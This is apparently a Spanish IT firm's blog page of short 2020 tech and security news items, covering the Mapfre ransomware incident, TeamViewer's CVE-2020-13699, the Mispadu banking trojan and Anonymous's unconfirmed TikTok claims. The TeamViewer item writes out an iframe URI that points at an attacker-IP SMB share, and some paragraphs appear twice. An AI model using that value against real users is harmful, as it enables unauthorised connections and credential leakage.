¡SÍGUENOS EN LAS REDES SOCIALES!
Te mantendremos informado de la actualidad
Artículo: «El día que Pixar borró Toy Story 2 y no tenía copia de seguridad»
Mapfre sufre un ataque informático «Ransomware»
La multinacional Mapfre aseguradora española ha sido víctima de un ataque denominado «Ransomware», según ha comunicado la misma compañía a través de su página web. Se trata de una comunicación muy breve dada por la compañía, en la que informan de la incidencia, si bien no dan información técnica sobre dicho ataque.
Según dicha comunicación, el ataque sí que ha tenido incidencia en sus operaciones, si bien, y esto me parece un aspecto destacable, partían de contar con un plan de contingencia con procedimientos alternativos, que fueron desplegados por Mapfre al detectar el ataque. Algo que, según afirma la compañía, ha permitido que puedan mantener su operativa, si bien no en las condiciones de servicio habituales, algo por lo que se disculpan en el comunicado digno de agradecer para sus asegurados.
La aseguradora Mapfre afirma que «no compromete la información de clientes».
Huawei se convierte en el mayor suministrador mundial de teléfonos inteligentes
La compañía china Huawei se ha convertido por primera vez en el mayor proveedor de teléfonos inteligentes del mundo durante el segundo trimestre de 2020, superando a otros grandes como el todo poderoso Samsung o Apple, según informa la firma de analistas Canalys.
Debido a las sanciones impuestas por el Gobierno estadounidense a la empresa, las exportaciones de Huawei cayeron un 27% durante el segundo trimestre del año, sin embargo, su presencia en China aumentó un 80% durante el mismo periodo, por lo que ahora vende el 70% de sus ‘smartphones’ en territorio chino.
Los envíos de celulares Huawei durante los meses de mayo a junio alcanzaron las 55,8 millones de unidades, un 5 % menos respecto al mismo periodo del año anterior. Por su parte, Samsung, el segundo mayor proveedor de ‘smartphones’, envió 53,7 millones de dispositivos, un 30 % menos que en el segundo trimestre de 2019.
De acuerdo a Ben Stanton, uno de los analistas principales de Canalys, «Huawei ha aprovechado al máximo la recuperación económica china» tras la crisis del coronavirus «para reavivar su negocio de teléfonos inteligentes».
Las Pymes incorporan el E-commerce en su estrategia de venta
En España estamos avanzado poco a poco en la digitalización, nos está costando, pero las pequeñas y medianas empresas del país siguen sin aprovechar todo el potencial del E-Commerce, algo que llevamos tiempo diciendo y no por el momento en el que vivimos, que obviamente nos influye y mucho. Así lo destaca el Índice de la Economía y la Sociedad Digitales (DESI) de la Comisión Europea de 2020, que sitúa a España en la posición 11º entre los 28 países miembros, y destaca un avance respecto a la puntuación del año anterior. El informe señala que, pese a los logros conseguidos, las Pymes españolas no apuestan aun lo suficiente por el «E-Commerce», siendo tan solo el 19% el que utiliza este canal de venta.
“Tenemos una idea equivocada en el pequeño comercio de que el uso de herramientas digitales de venta es un proceso complejo que, aunque aporte beneficios, requiere de una importante inversión de recursos y tiempo». Sin embargo, esto no es así. Las Pymes deben perder el miedo al mercado digital y aprovechar todas las oportunidades de negocio que este entorno ofrece, nuestro departamento de de desarrollo puede realizar un estudio personalizado, indicando en cada situación la mejor forma de estar presente.
“Tenemos un importante desafío para las Pymes en materia digital, pero sobre todo insistimos en que existe una oportunidad. Los esfuerzos realizados se convertirán en una ventaja competitiva capaz de hacer crecer nuestro negocio” TLC Sistemas estamos aquí para ayudaros a dar ese salto.
Un posible fallo en TeamViewer permite la intrusión sin permiso
Hoy os tenemos que informar de una vulnerabilidad detectada sobre TeamViewer, la cual permitiría que un posible intruso accediera a ese ordenador sin dejar rastro y así poder llevar a cabo diferentes tipos de ataques, como conseguir datos del mismo, copia ficheros, etc…
Es una realidad que en muchas ocasiones surgen fallos de seguridad que afectan a todo tipo de software que utilizamos en nuestro día a día. Pueden comprometer nuestra privacidad y poner en riesgo los dispositivos. Estas vulnerabilidades generalmente reciben actualizaciones por parte de los desarrolladores.
Desde TeamViewer nos han informado de que se ha lanzado un parche para corregir este importante fallo. La vulnerabilidad ha sido registrada como CVE-2020-13699 y ha sido calificada de alta gravedad.
Para ejecutar un ataque, un usuario necesitaría navegar a una página maliciosa que carga un iframe en el navegador web, posiblemente oculto o tan pequeño como un píxel, para evitar ser visto por un intruso. El iframe se carga a sí mismo usando el esquema de URI «teamviewer10:», que le dice al navegador que inicie la aplicación TeamViewer instalada en el equipo.
Estos esquemas de URI personalizados son utilizados por aplicaciones instaladas localmente que permiten al usuario iniciarlos desde su navegador. Por ejemplo, las URL que comienzan con «skype:» en el navegador iniciarían Skype. Otras aplicaciones de uso común como Slack, Zoom y Spotify usan estructuras similares.
Lo que haría el atacante para aprovechar esta vulnerabilidad de TeamViewer, es establecer el atributo src del iframe en ‘teamviewer10: –play \ attacker-IP share fake.tvs’. Este comando lo que hace es que la aplicación de TeamViewer que esté instalada se conecte al servidor del atacante a través del protocolo SMB.
La falta de visión les hizo dejar escapar a Google a precio de ganga
Equivocarse es de sabios, o eso dicen, pero las malas decisiones son difíciles de olvidar porque es tu propia conciencia quien te recuerda que fuiste tú quien tomó la decisión y que perdiste tu oportunidad. En la historia más reciente del mundo empresarial, la negativa de Excite a hacerse con Google a precio de ganga, se sitúa como uno de los fracasos más sonados.
Corría el año 1999 cuando George Bell, CEO de Excite.com recibió una oferta inicial para comprar Google por un millón de dólares. El ejecutivo rechazó la propuesta y Larry Page y Sergei Brin, los jóvenes fundadores del sitito de búsquedas, rebajaron el precio de venta a 750.000 $, con la esperanza de hacer más atractiva la venta.
La negociación tenía lugar –situémonos-, en los años en los que Yahoo era el rey de las búsquedas y el señor Bell, que temía que los usuarios salieran de su portal si se introducían en Google, no supo ver el potencial que podría ofrecerle. Finalmente, las negociaciones no llegaron a buen puerto y Excite dejó escapar a Google.
Desde entonces la suerte corrió de muy distinta manera para ambas compañías. Por una parte Excite prácticamente desapareció cuando en 2004 Ask Jeeves la adquirió y la convirtió en Ask.com; mientras, el pequeño e insignificante buscador se convirtió en el gigante que hoy todos conocemos, casi imposible de esquivar cuando uno navega por Internet y con un valor en bolsa del entorno de un billón de dólares. La negativa de Bell a comprar Google para Excite fue una mala decisión empresarial, a toro pasado y si miramos los números, aunque está claro que si aquella operación hubiera llegado a buen puerto, Google no sería la compañía que hoy conocemos.
Preguntado sobre este asunto por “Internet History Podcast”, Bell justificó su negativa más allá de las dudas empresariales, al hecho de que Larry Page mantuvo unas negociaciones muy duras y exigentes.
Mayores y el uso de la nueva tecnología: no descuidemos su ciberseguridad
El envejecimiento de la población es un hecho real. El aumento de la esperanza de vida, acortamiento de la vida laboral y la jubilación anticipada son las razones principales para el crecimiento de este sector. Con el auge de las nuevas tecnologías el distanciamiento de este sector con la sociedad parece aún mayor.
Es de gran importancia destacar que la implementación de las nuevas tecnológicas en nuestra sociedad actual supone importantes ventajas para el sector de la Tercera Edad, sin embargo, se sienten alejadas de ellas. Resulta evidente que este distanciamiento genera una desigualdad en el uso y provecho de las nuevas tecnologías que puede deberse a estas causas:
La utilidad: Muchos mayores desconocen cual es la utilidad de algunos dispositivos e instrumentos que puede mejorar su calidad de vida.
El envejecimiento de la población es un hecho real. El aumento de la esperanza de vida, acortamiento de la vida laboral y la jubilación anticipada son las razones principales para el crecimiento de este sector. Con el auge de las nuevas tecnologías el distanciamiento de este sector con la sociedad parece aún mayor.
Es de gran importancia destacar que la implementación de las nuevas tecnológicas en nuestra sociedad actual supone importantes ventajas para el sector de la Tercera Edad, sin embargo, se sienten alejadas de ellas. Resulta evidente que este distanciamiento genera una desigualdad en el uso y provecho de las nuevas tecnologías que puede deberse a estas causas:
La utilidad: Muchos mayores desconocen cual es la utilidad de algunos dispositivos e instrumentos que puede mejorar su calidad de vida.
La complejidad en el uso: A muchos les inquieta el hecho de adentrarse en un mundo demasiado complejo para ellos. Muchas personas no se atreven a utilizar estas herramientas por miedo a meter la pata, piensan que en cualquier momento pueden tocar una tecla inadecuada y perder toda la información o incluso borrar el contenido del disco duro.
El sentimiento de desfase: Según las últimas estadísticas, la mayoría de los adultos mayores que se introducen de forma autónoma en el mundo de las nuevas tecnologías suelen contar con una edad de entre 50-55 años. Por lo cual, existe un sentimiento de desfase con respecto a estos nuevos instrumentos.
Capacidad económica reducida: La capacidad de acceso a la tecnología más actual por parte del sector de la Tercera Edad es más dificultoso, debido a los altos costes que aun supone.
Nuestros mayores pueden padecer de cierta torpeza, pero no son tontos, de manera que con los conocimientos y las herramientas adecuadas pueden disfrutar de todas las posibilidades que ofrece la tecnología de una manera segura. Ahora bien, nuestro rol y nuestras acciones son un elemento fundamental para que así sea. Y aunque el maldito COVID nos ha robado a muchos de ellos, otros tantos siguen aquí con nosotros, regalándonos sonrisas y disgustos. Por eso nos toca ahora velar por su seguridad (ciberseguridad), y no nos podemos permitir fallarles.
El éxito en el e-commerce pasa por una página web profesional
Tener una página web profesional o no tenerla puede ser la clave que determine el futuro de tu negocio. Con el cataclismo del coronavirus, hemos podido corroborar cómo el mercado ha permanecido activo, ajeno a la desolación de las calles, y los consumidores han cubierto sus necesidades y buscado soluciones a través de Internet. En medio del caos, solo los que estaban preparados para el e-commerce (comercio electrónico) o los que pudieron dar el salto a tiempo, han podido sortear el temporal desde una zona de confort.
La oportunidad de llegar a los clientes a través de una página web profesional no solo garantiza la continuidad de una empresa, más allá de que las puertas estén abiertas o cerradas, sino que dispara la rentabilidad de la misma dado que permite una asistencia a los clientes en todo momento y desde cualquier lugar, sino que además brinda la oportunidad de presentarse como un gran escaparate en el que aparecen todos los productos que se ofrecen y los servicios que se prestan.
Los expertos de TLC SISTEMAS señalan algunas de las razones por las que una empresa debe contar con una página web profesional.
Credibilidad y confianza
Cuando un cliente potencial encuentra a una empresa en Internet siente mayor seguridad a la hora de contactar con ella. Su presencia en la web, a la vista de cualquiera, ofrece seriedad y profesionalidad.
Accesibilidad
Una página web profesional permite que cualquiera pueda acceder a la empresa desde cualquier lugar. No importan las fronteras, ni los kilómetros.
El mejor escaparate
Internet es el canal más rápido para encontrar cualquier información y una empresa puede ofrecer su mejor imagen a través de su página web profesional. El escaparate digital le permite mostrar todos sus productos y servicios y actualizarlos de forma periódica.
El mejor canal para disparar los ingresos
Un negocio permanece abierto a través de su página web profesional a cualquier hora del día y de la semana, lo que se ha venido a llamar un 24×7, lo que facilita un mayor número de ventas y por tanto generando ingresos.
Contacto
La web permite un canal de contacto directo con el cliente, pero además ofrece la información de forma rápida y dinámica.
Anonymous pide a los usuarios que se borren de TikTok: ¿por qué los hackers piden eliminar la app del momento?
El grupo de hackers Anonymous ha hecho una llamada a través de Twitter para que los usuarios de Tik Tok se borren la aplicación por razones de seguridad según anuncian.
A través de su perfil @YourAnonCentral, los hacktivistas piden «eliminar Tik Tok ahora. Si conoces a alguien que lo está usando, explícales que es esencialmente Malware operado por el gobierno chino que ejecuta una operación de espionaje masivo».
Según esta publicación de Reddit, TikTok recopila diversos datos de sus usuarios, entre los que se incluye información sobre el hardware del teléfono (incluido el tipo de CPU, número de curso, ID de hardware, dimensiones de pantalla, DPI, uso de memoria, espacio en disco, etc.); información relacionada con la red, como la IP, IP local, enrutador MAC, nombre del punto de acceso WiFi.
La aplicación china también recoge datos sobre otras aplicaciones instaladas en el dispositivo, incluidas las aplicaciones eliminadas; si el dispositivo está rooteado / liberado; GPS haciendo ping cada 30 segundos y un servidor proxy local en su dispositivo para transcodificar medios. Por el momento, no se ha podido confirmar la veracidad de esta información publicada en Reddit. TikTok no ha hecho ningún comentario sobre el asunto.
La aplicación china también recoge datos sobre otras aplicaciones instaladas en el dispositivo, incluidas las aplicaciones eliminadas; si el dispositivo está rooteado / liberado; GPS haciendo ping cada 30 segundos y un servidor proxy local en su dispositivo para transcodificar medios. Por el momento, no se ha podido confirmar la veracidad de esta información publicada en Reddit. TikTok no ha hecho ningún comentario sobre el asunto.
En el mismo hilo de tuits publicados por Anonymous, también asegura que «Tiktok está recolectando datos sobre niños y adolescentes para monitorear su alcance de mercado y desarrollo político; para encontrar las mejores metodologías para forzarlos en los próximos 5 a 10 años. Esto le da a China una ventaja sobre la manipulación de grandes sectores de la sociedad en varios países.»
El troyano bancario Mispadu ahora en cupones falsos de Amazon
La compañía ESET en su delegación en España, ha alertado de una nueva campaña maliciosa que estaría extendiendo el troyano bancario «Mispadu» en España, México y Portugal utilizando como gancho cupones de descuento de «Amazon».
La campaña maliciosa emplea una web preparada por los ciberdelincuentes que simula pertenecer a Amazon y que se promociona a través de anuncios mostrados en «Facebook». En la web falsa se pueden ver auténticas ofertas sin sentido, accesibles simplemente pulsando un botón de «Generar cupón».
Si el incauto compradoro cae en la trampa, será redirigido a un enlace externo desde donde se descargará un archivo comprimido de nombre “Cupón-02190.zip”. Este archivo contiene en su interior dos ejecutables. Un “Cup¢n-92190.msi” correspondiente al código malicioso encargado de iniciar la cadena de infección en el sistema de la víctima, mientras que el otro archivo se trata del instalador renombrado de Mozilla Firefox en portugués.
Este tipo de cadena se caracteriza por la ejecución de varios scripts (En informática, un script, secuencia de comandos que se usa para designar a un programa relativamente simple) de Visual Basic en varias fases, algunos de ellos ejecutados dentro de un mismo proceso. «Este proceso de infección hace que, con las soluciones de seguridad adecuadas, sea posible detectar varios de los procesos que componen el malware conforme se van ejecutando», explican desde ESET.
El resumen es que el usuario terminará infectado con Mispadu, un tipo de troyano bancario cuya finalidad es robar las credenciales de acceso a los servicios de banca on-line de varias entidades que operan en los países donde se está reproduciendo la campaña: España, México y Portugal.
